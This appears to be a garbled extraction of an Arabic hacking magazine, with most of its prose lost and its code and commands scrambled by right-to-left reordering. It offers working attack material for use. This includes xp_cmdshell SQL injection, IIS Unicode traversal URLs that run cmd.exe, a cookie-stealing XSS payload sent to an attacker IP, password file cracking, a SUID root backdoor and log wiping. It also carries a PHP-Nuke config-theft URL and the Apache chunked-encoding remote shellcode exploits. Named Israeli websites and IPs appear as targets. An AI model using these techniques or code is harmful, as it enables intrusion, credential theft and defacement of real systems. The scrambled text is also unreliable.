+---------------------------
Procedure
'exec master..xp_cmdshell 'dir
. xp_cmdshell
'exec master..xp_regwrite
642
asp
asp
))CREAT TABLE M_3 ( source
varchar(8000
. M_3
varchar
8000
'bulk insert M_3 from
'c:\InetPub\wwwroot\login
asp.
643
union
.
"
"
> . <
>< CONIK :
644
-:
-:1
-: .
645
user administrator
.
) (
646
-:2
-: %99
C
.
shell
PHP
Shell PHP ..
647
Kernel 2.2.x
.
) C
(
perl
.
linux Redhat 7.3
648
-:3
-:
file.pl/.
----Access Denied .
-----chmod +x Conik.pl
649
Conik.pl/. $
-:4 C
-: .
Conik.c/.
650
Sendemail
.
651
Root
. Exan nofer
XXX.
SENDMAIL
(-:
.
-:5
-:
-:6 Conik
652
. C Perl
.
PHP - CGI -
UNICODE - VB - etc
-:7 UNICODE
-: UNICODE
. IIS Microsoft
-: UONICODE
653
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
samples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
adsamples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
654
\:dir+c
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
cgi-bin/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
UONICODE
CGI
cgi-bin/view-/
source?../../../../../../../etc/passwd
cgi-bin/phf/
655
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/
657
658
"
"
> <
><Black_sNiper :
...
.
...
.
.
659
. .:
who
rwho
finger
.
.:
username : Black
password : Black2
test
demo
. .:
660
etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs/
etc/shadow/
.: bin
.
)(
)( !!
.:
$ ed passwd
exec login
.!!
661
.
. !!
. .:
.
)( . ..
.:
$ pwd
.:
$ /usr/admin
. ..
.. :
$ /usr/Black
.!!
. .:
$ ls /usr/Black
. .:
mail
pers
games
662
bin
profile.
.:
$ cd
$ ls -a
:
:
profile.
$
.:
$ cat letter
letter
.:
$ passwd
!!
..
.:
$ grep phone Black
663
.
.
.:
$ cp letter letters
.
.:
$ write
. .:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31
. .
..
.:
$ cat /etc/passwd
664
:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administra
tion:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file
system:/usr/admin:/bin/rsh
.:
Black:chips11,43:34:3:Mr
:doooom:/usr/Black
.
..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70
665
!!
. .
. ..
666
"
"
><
> : <
UNix Usage IN HackinG
.. up to date
667
(:
: pc ,
servers , supercomputers
BOX
. .
..
... root
, superuser
.....
:
.. . .
.. windows .
. ..
.. ...
:
-1
...
nt . 9x
668
.. .
..
..
-2 ..
..
...
.. :
-1 ). (
-2 open
source
.. (:
BSD . ..
...
..
669
..
) SuSe
(
MDK
..
9 7.2
) (
.. .. ...
.. ..
..
.. ... .. ..
.
.. ...
.. (:
..
670
.. . ...
.. ..
. ..
.
.. . ..
.
.. ..
internal
.. winmodems
.
.. windows . ..
. (:
.. . external
. real or true modems
... acorp ,
u.s. robotics
. serial USB
...
.. isp
. (:
671
..
:
-1 ..
isp ...
-2
...
-3 ... ..
..
(:
=====< ...
..
======< ======<
...
..
.
672
:
.
. ..
..
-4 .
gov .mil edu.
.
-5 ..
.
REdirecting
: TCP .
..
TCP\IP
....
... =D
.. .
673
..
) (
..
<< service
service
daemon or server
.. .
. .. .
=D
..
21
23
25
FTPd
FTP
telnetd Telnet
sendmail
SMTP
(!(yes
apache
HTTP
80
qpop
POP3
110
d ftp , telnet ..etc
daemon
674
:
www.host.net
.
TCP 80
.
GET /HTTP/1.1 /index.html
..
.
index.html
daemons
...
=<
.
daemons
...
..
... port scaners
675
..
...
nmap fyodor
!!.. ..
=>
http://members.lycos.co.uk/linuxd
/ude/e3sar
..
nmap rpm
:
bash-2.03$ rpm -i nmap-2.531.i386.rpm
. ..
. target.edu
..
:
bash-2.03$ nmap -sS target.edu
676
nmap .
!! .
677
daemons target.edu
..
.. ..
.. ..
..
... TCP :
bash-2.03$ telnet target.edu 21
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu FTP server 220
.(SunOS 5.6) ready
quit
.Goodbye 221
Connection closed by foreign
host
(:
678
SunOS 5.6 . -1
standard -2
sunOS
:
bash-2.03$ telnet target.edu 25
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu ESMTP Sendmail 220
8.11.0/8.9.3; Sun, 24 Sep 2000
09:18:14 -0
(EDT) 400
quit
target.edu closing 2.0.0 221
connection
Connection closed by foreign
.host
679
smtp
sendmail
8.11.0/8.9.3
..
daemon . ..
:
nmap
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by
fyodor@insecure.org
( /( www.insecure.org/nmap
Interesting ports on target.edu
:((xx.xx.xx.xx
)The 1518 ports scanned but not
(shown below are in state: closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
680
tcp open
tcp open
tcp open
smtp/25
http/80
pop3/110
681
.
..
..
...
Ss-
=D
:
bash-2.03$ man nmap
..
)
(
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
shell.com FTP server 220
.(SunOS 5.6) ready
682
Name: luser
.Password required for luser 331
:Password
.User luser logged in 230
ftp> put program.c
.PORT command successful 200
ASCII data connection for 150
.(program.c (204.42.253.18,57982
.Transfer complete 226
ftp> quit
Goodbye 221
ftp
.
.
.
sh-2.03$ vi exploit.c
c.
.
683
.
.. TARGET.EDU
.
sendmail 8.11.0
..
:
http://www.pharaonics.net/less/NEt
works/124.htm
. .
.. )
(
..
....
..
..
685
:
www.securityfocus.com
www.insecure.org/sploits.html
..
..
...
. ) (
.
shell code
. ..
.
= []char shellcode
"\
xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88
"\x46\x07\x89\x46\x0c\xb0\x0b
686
"\
x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
"\x80\x31\xdb\x89\xd8\x40\xcd
"\;"x80\xe8\xdc\xff\xff\xff/bin/sh
.. .
bin/sh/
.
. ..
.
...
.. .
..
bash-2.03$ telnet myshellaccount
23
...Trying xx.xx.xx.xx
.Connected to yourshellaccount
687
root
.. =(
..
.
local
....
) =((
.. =<
-: .. ..
.
. ..
..
edu.
689
.
microsoft.com , ibm.com etc
...
..
<----- <------
.
.. exit
.
.
..
...
..
..
... =| =|
690
.
=| !!!!!!
(= ...
.
..
..
-1 sushi
. sushi suid shell
. bin/sh/
. suid
:
sh-2.03$ cp /bin/sh /dev/nul
.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
691
-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul
..
..
..
sh-2.03$ exit
80. = D
:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(
692
..
suid
sushi
sash A
stand-alone shell
...
suid /
bin/sh sushi
-2
/
etc/passwd
-: vi
sh-2.03$ vi /etc/passwd
. .
vi
luser:passwd:uid:gid:startdir:shell
693
.
TCP UDP
..
694
TCP
UDP
-: . .. .
..
..
Last login: Sun Sep 24 10:32:14
.<from <yourIPaddress
-:
..
695
..
=(
usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
. lled
..
. ...
. ftp
. wted lled
who
sh-2.03$ who
Sep 25 18:18
tty1
696
root
. zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:
..
.
697
698
"
"
> <
> : <
...
.
. .
.
699
FreeServers.com
. :
.
700
.
.
.
.
.
Caller ID
...
701
notepade
Hakkerz.home.ml.org
html
@Blahblahblah
.
.
header
.
IP
Whois
702
. finger
@Finger
. scan ports
IP
Linux /Unix systems
Exploit Generator
703
. linux
21
FTP 23
TelNet
Telnet
Anonymous
. .
hakkerz.home.ml.org
telnet 23
www
telnet.Victim.com telnet
www
whois
21
ftp
704
SYST
80 http
Whats
?Running
.
.
Login: root$
Password: root$
linux
. . telnet
.
ACCOUNT: PASSWORD
705
whois
.
unix .
passwd
. ftp
. internet
explorer
. IP
jammer
.hakkerz.home.ml.org
.
ftp:// abc.net /ftp://ftp.abc.net
ftp
whois
\ etc
passwd
root:2fkbNba29uWys:0:1:Operator:/:
707
/bin/csh
admin:rYsKMjnvRppro:100:11:WW
W
administrator:/home/Common/WW
W:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisahar
u
[.etc]
kangaroo .
3a62i9qr
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW
administrator:/home/Common/WW
W:/bin/csh
kangaroo:*:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/
local/bin/tcsh
708
* s ?xs
John the Ripper 1.5
.
709
710
:
711
PHP Shell
**-----------------------------------------------
:
**-----------------------------------------------
ls -a :
**-----------------------------------------------
cat -e : cat
**-----------------------------------------------
712
rm -f :
**-----------------------------------------------
rm -d :
**-----------------------------------------------
cp -i :
**-----------------------------------------------
mv :
713
**-----------------------------------------------
:
--
help
ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
714
-1
715
-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!
716
-1
: hacked.txt
**-----------------------------------------------
-2
**-----------------------------------------------
-3 .
717
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2
.
719
**-----------------------------------------------
-1 My SQL
config.php
PHP Shell
cat config.php
**-----------------------------------------------
-2 htpasswed.
720
htaccess.
:
home/site/.htpasswds/forum/admin/
/passwd
cat :
/home/site/.htpasswds/forum/admin/
passwd
DES
user:nymw4oS3oerdY
**-----------------------------------------------
-3
: service.pwd
DES
721
:
_vti_pvt
cat :
/home/site/www/_vti_pvt/service.pw
d
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :
phpMyAdmin
config.php
722
!!
723
ls -a /home/SITE
= SITE
**-----------------------------------
-2 :
home
:
:
/home/site/public_html
725
/home/site/www
**-----------------------------------
-3
.
726
727
728
.
.
:
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan
. ..:
remote OS detection via TCP/IP
fingerprinting
729
stealth scanning
dynamic delay and
retransmission calculations
parallel scanning
detection of down hosts via parallel
pings
decoy scanning port
filtering detection
direct (non-portmapper) RPC
scanning
fragmentation scanning
flexible target and port specification
.
730
)(
)(
:
. .
731
TCP sequencability
.
732
"
"
> <
><network access :
.
.
733
.
.
)
(
%50
%50
. .
. . .
734
aswind.COM
ip
INTERNIC.NET
INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
.Registrar: ONLINENIC, INC
Whois Server: whois.OnlineNIC.com
Referral URL:
/http://www.onlinenic.com
Name Server: DNS.ASWIND.COM
735
DNS
.
HowIS
IP
LMHOSTS
NetBios IP
C
200.200.200.0 LMHOSTS
NetBios = N2
200.200.200.2 Net
view //servername N1
N254
1 254
.
\
737
Administrator
Windwos
.
username and password
net user
. . .
.
. . .
738
Messenger Service .
NetBios
. IP 200.200.200.200
. nbtstat -a
200.200.200.200
.
MSBROWSER )
(
John IP
200.200.200.50
Nbtstat -a 200.200.200.50
john
johnPC
. )
( Administrator
. Messenger Service
)
(
MSBROWSER
739
nbtstat -a
.
nt senstiver
)
(.
l0pthcrack .
740
741
:
* .
.
* VBULLETIN
YaBB and UBB
*.
743
*
=============================
=============================
=============================
=========
:
...
...
=============================
=============================
=============================
744
=========
:
...
.
.
:
745
HTML
>script>document.write('<img
src="http://my_ip_address/'+docum
<ent.cookie+'">';</script
746
>A
HREF="http://example.com/commen
?t.cgi
mycomment=<SCRIPT>malicious
<code</SCRIPT>"> Click here</A
comment.cgi
mycomment
747
. .
:
>A
HREF="http://example.com/commen
t.cgi? mycomment=<SCRIPT
SRC='http://badsite/badfile'></SCRIPT>"> Click
<here</A
.
748
BADFILE
.
cross-site scripting
" " .
CSS
cross-site scripting
CASCADE style sheets
749
=============================
============================
:
750
http://www.cert.org/advisorie
s/CA-2000-02.html
http://www.perl.com/pub/a/20
02/02/20/css.html
" "
751
> <
> :<
,
...
, - - -
- ......
........... :
.
.
.
.
.
.
.
.
.
.
.
752
.
.
:
=============================
=====================
=
h3>put your text
--><here<xmp><plaintext
=============================
=====================
:
=====
!
" "
> <
><Dr^FunnY :
...
html
.....
754
...
"
"
"
... "HTML ...
(:
.
.
755
" "
756
> <
= Exploit =
:
.
..
:
-1
super scan
.
-2 . .
.
. .
.
www.netcraft.net
!.!!..
. ...
757
-3
-4
/....../www.thesite.com
:
*pl.
Active Perl
* c.
*sh.
www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
758
www.ussrback.com
www.packetstorm.securify.co
m
www.secureroot.com
www.rootshell.com
.
.
..
shadowed .encryption
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer
Admin:/usr/spool/lp:
759
root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh
= root .
= x
shadowed
shadow file
760
= token
Linux :
/etc/shadow
*=
token
SunOS : /etc/shadow
* = token
FreeBSD : /etc/master.passwd or
x = * /etc/shadow
token
IRIX :
/etc/shadow
token = x
AIX :
/etc/security/passwd
!=
token
ConvexOS : /etc/shadow or
/etc/shadpw
* = token
761
root:EpGw4GekZ1B9U:11390::::::
::::::bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445
EpGw4GekZ1B9U
John the ripper
.
.
x
:
john passwd
passwd
:
762
john.pot
.
.
" "
> <
>< icer :
763
. :
1
2 )
(
3 ...
4 ...
....
DoS
.
. DoS GET /
POST
OVERLOAD
)
24 (
.... OFFLINE
..
. ..
765
. ..
threads
cgi scaners
..
...
<<< shadow security scaner
.....
rootshell.com
red hat 7.2
...... red hat 7.2
766
2
)
( shadow
..
...
url
.. ..
url
rootshell.com
%99
..
.......
3 :
767
..
..
commands ..
, http BOF
..
..
....
config.inc
... DES/MD5 /
.... etc/passwd ...
.
DoS
. DoS
768
...
..
4 :
:
packetstorm.securify.com
/.securityfocus.com
/www.insecure.org
/www.rootshell.com
.(:
769
" "
><
><oOoDa BE$T :
:
txt. :
..
770
,..
..
c. :
..
..
)_ (compile
)(_ .
...
.. Linux
.. Shell Account
:
>---- gcc filenmae.c
:
>--- a.out ..
..
:
771
a.out xxx.xxx.xxx.xxx/.
:
pl. :
Linux ..
Shell Account
: exploit
perl filename.pl xxx.xxx.xxx.xxx
filename xxx.xxx.xxx.xxx/.
772
"
"
> .<
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000
98
.
98 :
Web Folders :
:
:
773
My Computer
My Computer
Web Folders
:
Add Web Folder
: Add Web Folder
Type the location to add
. :
/http://hostname.com
hostname
774
:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
:
/http://192.117.143.121
Next :
:
finish
Web Folder :
775
:
http://www.israwine.co.il/
212.199.43.84
:
.
776
777
" "
<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero
and supergate
Posted on Monday, September 24 @
14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
778
twlc/.
Summary
This time the bug is really
dangerous...it allows you to 'cp' any
file on the box... or even upload
...files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a
released c. is ok while the final 5.2
(is bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?
upload=1&file=config.php&file_nam
e=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacke
d.txt
779
;"if($cancel) $op="FileManager
} (if($upload
copy($userfile,$basedir.$wdir.
;($userfile_name
lastaction = ""._UPLOADED."$
;"$userfile_name --> $wdir
This need a rewrite //
-------------------------------------> OMG!
WE TOTALY AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
Header("Location: admin.php?
;("op=FileManager
;exit
{
781
;($userfile_name
lastaction = ""._UPLOADED."$
;"$userfile_name --> $wdir
This need a rewrite //
-------------------------------------> OMG!
WE TOTALY AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//
;()html_header//
;()displaydir//
;"/"=wdir2$
;(chdir($basedir . $wdir2
;()CloseTable//
;("include("footer.php//
Header("Location: admin.php?
;("op=FileManager
;exit
{
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
785
http://www.server.net/admin.php?
upload=1&file=config.php&file_nam
e=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacke
d.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
http://www.server.net/admin.php?
upload=1&file=config.php&file_nam
e=ultramode.txt&wdir=/&userfile=co
nfig.php&userfile_name=ultramode.
txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
786
= config.php ultramode.txt
(-:
http://server.com/ultramode.txt
=-
-1 server.com
-2 :
http://server.com/nuke
-3 5.2
.
787
788
> <angels-bytes
Chunked Apache
. angels-bytes
Retina
Apache Chunked Scanner
. 254
.
789
2.0.39
http://www.apache.org/dist/httpd/bi
naries
1.3.24 2 2
dev-2.0.36
))*/ angels-
bytes.com ((
790
/*
/** /
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
define#
791
MEMCPY_s1_OWADDR_DELTA
-146
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
define#
SHELLCODE_LOCALPORT_OFF 30
= []char shellcode
\\\\ "\\\
x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x
\10
\\\
x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\x
\\b8
"\\\x1f\\
\\\\ "\\\
x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x
\7a
\\\
x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x
\\7a
"\\\x02\\
\\\\ "\\\
x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x
\90
793
\\\
xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x
\\24
"\\\x04\\
\\\\ "\\\
x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\x
\c7
\\\
x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x
\\00
"\\\xb8\\
\\\\ "\\\
x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x
\ff
\\\
x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x
\\08
"\\\x03\\
\\\\ "\\\
x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x
\0b
\\\
794
x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x
\\01
"\\\x89\\
\\\\ "\\\
xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x
\6a
\\\
x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\x
\\cd
"\\\x80\\
\\\\ "\\\
x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x
\2f
\\\
x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\x
\\c0
"\\\x50\\
\\\\ "\\\
x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x
\50
\\\
xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\
795
\\x80
;"\\\xcc\\
} struct
;char *type
;u_long retaddr
targets[] = { // hehe, yes theo, that {
!say OpenBSD here
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0xcf92f
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.22\\\", 0x8f0aa
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0x8f2a6
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.23\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x9011a
OpenBSD 3.1 x86 / Apache"\\\ }
796
} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
printf(\\\" Using targets:\\\\t./apache;("\\\scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using
bruteforce:\\\\t./apache-scalp
;("\\\0x8f000 127.0.0.1:8080\\\\n
797
else
;bruteforce = 1
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress = 0;;retaddr
} (+= RET_ADDR_INC
/* skip invalid return adresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
else if(memchr(&retaddr, 0x0a, 4) ||
((memchr(&retaddr, 0x0d, 4
;continue
sock = socket(AF_INET,
;(SOCK_STREAM, 0
;sin.sin_family = AF_INET
sin.sin_addr.s_addr =
799
;(inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
if(connect(sock, (struct sockaddr *)
} (& sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
;(exit(1
{
;(lport = ntohs(from.sin_port
shellcode[SHELLCODE_LOCALPOR
;T_OFF + 1] = lport & 0xff
shellcode[SHELLCODE_LOCALPOR
;T_OFF + 0] = (lport >> 8) & 0xff
p = expbuf = malloc(8192 +
((PADSIZE_3 + NOPCOUNT + 1024)
(* REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR *)) +
4) + REP_ZERO + 1024) *
;((REP_POPULATOR
PUT_STRING(\\\"GET /
HTTP/1.1\\\\r\\\\nHost: apache;("\\\scalp.c\\\\r\\\\n
(++for (i = 0; i < REP_SHELLCODE; i
801
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_3,
;(PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
memcpy(p, shellcode,
;(sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
(++for (i = 0; i < REP_POPULATOR; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_1,
;(PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < REP_RET_ADDR; j
;p++ = retaddr & 0xff*
;p++ = (retaddr >> 8) & 0xff*
;p++ = (retaddr >> 16) & 0xff*
802
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using
retaddr 0x%lx, length %u, localport
,"\\\%u
retaddr, (unsigned int)(p - expbuf),
;(lport
memset(buf + strlen(buf), \\' \\', 74 ;((strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p
;(fflush(stdout
804
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
if(select(sock + 1, &fds, NULL,
} (NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
if((n = read(sock, buf, sizeof(buf) (1)) <= 0
;break
if(!owned && n >= 4 &&
memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) ==
805
} (0
printf(\\\"\\\\nGOBBLE GOBBLE!@#
;("\\\%%)*#\\\\n
printf(\\\"retaddr 0x%lx did the
;(trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo
hehe, now use 0day OpenBSD local
kernel exploit to gain instant
;("\\\r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
if((n = read(0, buf, sizeof(buf) - 1)) <
(0
;(exit(1
;(write(sock, buf, n
806
{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
fprintf(stderr, \\\"Ooops..
;("\\\hehehe!\\\\n
;return -1
{
{
;return 0
{
807
:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
;memset(p, b, n); p += n
= []char shellcode
\\\\ "\\\
x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\x
\e3
\\\
x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\x
\\c6
"\\\x04\\\\x24\\
\\\\ "\\\
x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x
\31
\\\
xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\x
\\d1
"\\\xea\\\\x31\\
\\\\ "\\\
xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\
\x02
\\\
x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x
810
\\80
"\\\x7c\\\\x24\\
\\\\ "\\\
x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x
\89
\\\
x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x
\\04
"\\\x20\\\\x89\\
\\\\ "\\\
x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x
\0c
\\\
x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x
\\24
"\\\x14\\\\x89\\
\\\\ "\\\
x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x
\18
\\\
x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x
\\5d
811
"\\\xcd\\\\x80\\
\\\\ "\\\
x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x
\27
\\\
x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\x
\\ff
"\\\x04\\\\x24\\
\\\\ "\\\
x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x2
\4
\\\
xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x5
\\1
"\\\x50\\\\xb0\\
\\\\ "\\\
x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\
\x58
\\\
x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x
\\58
"\\\x41\\\\x80\\
812
\\\\ "\\\
xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x
\90
\\\
x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\x
\\c0
"\\\xb0\\\\x5a\\
\\\\ "\\\
xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x
\80
\\\
x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x
\\31
"\\\xc0\\\\x50\\
\\\\ "\\\
xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x
\24
\\\
x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x
\\68
"\\\x2a\\\\x47\\
\\\\ "\\\
813
x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x
\50
\\\
x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\
\\x04
"\\\xcd\\\\x80\\
\\\\ "\\\
x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x
\73
\\\
x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x
\\89
"\\\xe3\\\\x50\\
\\\\ "\\\
x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x
\50
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
char *type; /* description for newbie
/* penetrator
814
,{ 42
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.24 (Unix)\\\", -90, 0x80efa00, 5,
,{ 42
;victim ,{
} (void usage(void
;int i
printf(\\\"GOBBLES Security
